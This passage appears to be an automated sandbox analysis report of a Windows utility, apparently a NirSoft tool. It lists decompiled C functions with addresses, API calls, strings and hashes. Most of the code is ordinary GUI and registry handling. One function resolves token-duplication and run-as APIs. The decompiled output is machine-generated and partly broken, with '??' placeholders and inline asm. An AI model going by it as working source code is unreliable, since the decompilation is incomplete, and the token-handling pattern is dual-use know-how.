                                                                                                          • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                          • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                        • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                        • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                        • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                        • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                        • memset.MSVCRT ref: 004062DA
                                                                                                        • GetWindowTextW.USER32 ref: 004062F1
                                                                                                        • EnumChildWindows.USER32 ref: 0040631E
                                                                                                        • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                          • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                        • String ID: caption
                                                                                                        • API String ID: 973020956-4135340389
                                                                                                        • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                        • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                        • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                        • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 65%
                                                                                                        			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                        0x004081e4
                                                                                                        0x004081ec
                                                                                                        0x004081fc
                                                                                                        0x00408200
                                                                                                        0x00408215
                                                                                                        0x0040821c
                                                                                                        0x0040822a
                                                                                                        0x00408231
                                                                                                        0x0040823f
                                                                                                        0x00408246
                                                                                                        0x0040824b
                                                                                                        0x0040824e
                                                                                                        0x0040825a
                                                                                                        0x0040825c
                                                                                                        0x00408261
                                                                                                        0x0040826c
                                                                                                        0x0040826d
                                                                                                        0x0040826e
                                                                                                        0x00408273
                                                                                                        0x00408273
                                                                                                        0x00408276
                                                                                                        0x0040827c
                                                                                                        0x0040828a
                                                                                                        0x00408290
                                                                                                        0x004082ab
                                                                                                        0x004082c5
                                                                                                        0x004082c6
                                                                                                        0x004082d1
                                                                                                        0x004082d2
                                                                                                        0x004082d3
                                                                                                        0x004082e7
                                                                                                        0x004082ec
                                                                                                        0x004082f0
                                                                                                        0x00000000
                                                                                                        0x004082f5
                                                                                                        0x004082fe

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                        • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf$wcscpy
                                                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                        • API String ID: 1283228442-2366825230
                                                                                                        • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                        • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                        • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                        • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                        0x0040920a
                                                                                                        0x00409218
                                                                                                        0x00409223
                                                                                                        0x0040922c
                                                                                                        0x0040924b
                                                                                                        0x00409253
                                                                                                        0x0040929b
                                                                                                        0x004092e4
                                                                                                        0x0040929d
                                                                                                        0x004092a3
                                                                                                        0x004092b1
                                                                                                        0x004092bd
                                                                                                        0x004092cc
                                                                                                        0x004092d1
                                                                                                        0x004092d8
                                                                                                        0x004092dd
                                                                                                        0x00409255
                                                                                                        0x0040925b
                                                                                                        0x00409269
                                                                                                        0x00409275
                                                                                                        0x00409282
                                                                                                        0x0040928d
                                                                                                        0x00409292
                                                                                                        0x004092ec
                                                                                                        0x004092ef
                                                                                                        0x004092ef
                                                                                                        0x00409231
                                                                                                        0x00409232
                                                                                                        0x00409233
                                                                                                        0x00000000
                                                                                                        0x00409239
                                                                                                        0x0040921a
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • wcschr.MSVCRT ref: 00409223
                                                                                                        • wcscpy.MSVCRT ref: 00409233
                                                                                                          • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                          • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                          • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                        • wcscpy.MSVCRT ref: 00409282
                                                                                                        • wcscat.MSVCRT ref: 0040928D
                                                                                                        • memset.MSVCRT ref: 00409269
                                                                                                          • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                          • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                        • memset.MSVCRT ref: 004092B1
                                                                                                        • memcpy.MSVCRT ref: 004092CC
                                                                                                        • wcscat.MSVCRT ref: 004092D8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                        • String ID: \systemroot
                                                                                                        • API String ID: 4173585201-1821301763
                                                                                                        • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                        • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                        • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                        • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 48%
                                                                                                        			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                        0x00409c73
                                                                                                        0x00409c7c
                                                                                                        0x00409c90
                                                                                                        0x00409c9f
                                                                                                        0x00409ca2
                                                                                                        0x00409ca7
                                                                                                        0x00409ca9
                                                                                                        0x00409cb1
                                                                                                        0x00409cc0
                                                                                                        0x00409cc2
                                                                                                        0x00409cc7
                                                                                                        0x00409ccf
                                                                                                        0x00409cd0
                                                                                                        0x00409cd7
                                                                                                        0x00409cd8
                                                                                                        0x00409cd9
                                                                                                        0x00409cda
                                                                                                        0x00409cdc
                                                                                                        0x00409ce0
                                                                                                        0x00409ce1
                                                                                                        0x00409ce9
                                                                                                        0x00409cf1
                                                                                                        0x00409cfb
                                                                                                        0x00409d08
                                                                                                        0x00409d08
                                                                                                        0x00000000
                                                                                                        0x00409d0d
                                                                                                        0x00409d0f

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                        • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                        • strlen.MSVCRT ref: 00409CE4
                                                                                                        • strlen.MSVCRT ref: 00409CF1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProcstrlen
                                                                                                        • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                        • API String ID: 1027343248-2054640941
                                                                                                        • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                        • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                        • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                        • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                                        0x004028a3
                                                                                                        0x004028ab
                                                                                                        0x004028bd
                                                                                                        0x004028ca
                                                                                                        0x004028d7
                                                                                                        0x004028e3
                                                                                                        0x004028e6
                                                                                                        0x004028e8
                                                                                                        0x00000000
                                                                                                        0x004028eb
                                                                                                        0x004028ec

                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                        • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                        • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                        • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                        • API String ID: 2238633743-1970996977
                                                                                                        • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                        • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                        • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                        • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 39%
                                                                                                        			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                                        0x004045c2
                                                                                                        0x004045d1
                                                                                                        0x004045da
                                                                                                        0x004045ef
                                                                                                        0x004045f6
                                                                                                        0x00404604
                                                                                                        0x0040460b
                                                                                                        0x00404610
                                                                                                        0x00404616
                                                                                                        0x00404617
                                                                                                        0x00404618
                                                                                                        0x00404628
                                                                                                        0x00404629
                                                                                                        0x0040462a
                                                                                                        0x0040462f
                                                                                                        0x00404630
                                                                                                        0x00404631
                                                                                                        0x0040463c
                                                                                                        0x0040463d
                                                                                                        0x0040463e
                                                                                                        0x00404656
                                                                                                        0x00404662
                                                                                                        0x0040466b
                                                                                                        0x0040466d
                                                                                                        0x0040466e
                                                                                                        0x00404674
                                                                                                        0x00404679

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Delete_snwprintfmemset$Close
                                                                                                        • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                        • API String ID: 1018939227-3575174989
                                                                                                        • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                        • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                        • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                        • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                        0x0040314a
                                                                                                        0x00403151
                                                                                                        0x00403158
                                                                                                        0x0040315a
                                                                                                        0x00403162
                                                                                                        0x00403166
                                                                                                        0x00403190
                                                                                                        0x00403190
                                                                                                        0x00403198
                                                                                                        0x00403199
                                                                                                        0x0040319e
                                                                                                        0x004031bb
                                                                                                        0x004031a0
                                                                                                        0x004031ad
                                                                                                        0x004031b6
                                                                                                        0x004031b6
                                                                                                        0x0040319e
                                                                                                        0x0040316e
                                                                                                        0x00403176
                                                                                                        0x0040317c
                                                                                                        0x0040317f
                                                                                                        0x0040317f
                                                                                                        0x00403182
                                                                                                        0x0040318a
                                                                                                        0x00000000
                                                                                                        0x0040318c
                                                                                                        0x0040318c
                                                                                                        0x00000000
                                                                                                        0x0040318c

                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                        • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                        • API String ID: 2780580303-317687271
                                                                                                        • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                        • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                        • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                        • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                        0x00404da9
                                                                                                        0x00404dbc
                                                                                                        0x00404dbf
                                                                                                        0x00404dc6
                                                                                                        0x00404dcc
                                                                                                        0x00404dce
                                                                                                        0x00404de1
                                                                                                        0x00404deb
                                                                                                        0x00404df2
                                                                                                        0x00404df4
                                                                                                        0x00404df4
                                                                                                        0x00404e07
                                                                                                        0x00404e0d
                                                                                                        0x00404e18
                                                                                                        0x00404e1c
                                                                                                        0x00404e1e
                                                                                                        0x00404e27
                                                                                                        0x00404e28
                                                                                                        0x00404e29
                                                                                                        0x00404e2f
                                                                                                        0x00404e31
                                                                                                        0x00404e37
                                                                                                        0x00404e41
                                                                                                        0x00404e42
                                                                                                        0x00404e43
                                                                                                        0x00404e46
                                                                                                        0x00404e46
                                                                                                        0x00404e1c
                                                                                                        0x00404e4d
                                                                                                        0x00404e50
                                                                                                        0x00404e5f
                                                                                                        0x00404e66
                                                                                                        0x00404e52
                                                                                                        0x00404e52
                                                                                                        0x00404e52
                                                                                                        0x00404e6d
                                                                                                        0x00404e70
                                                                                                        0x00404e85
                                                                                                        0x00404e85
                                                                                                        0x00000000
                                                                                                        0x00404e72
                                                                                                        0x00404e7b
                                                                                                        0x00404e80
                                                                                                        0x00404e83
                                                                                                        0x00404e87
                                                                                                        0x00404e89
                                                                                                        0x00404e8b
                                                                                                        0x00404e8b
                                                                                                        0x00404ea8
                                                                                                        0x00404ea8
                                                                                                        0x00000000
                                                                                                        0x00404e83

                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                        • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                        • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                        • ReleaseDC.USER32 ref: 00404DF4
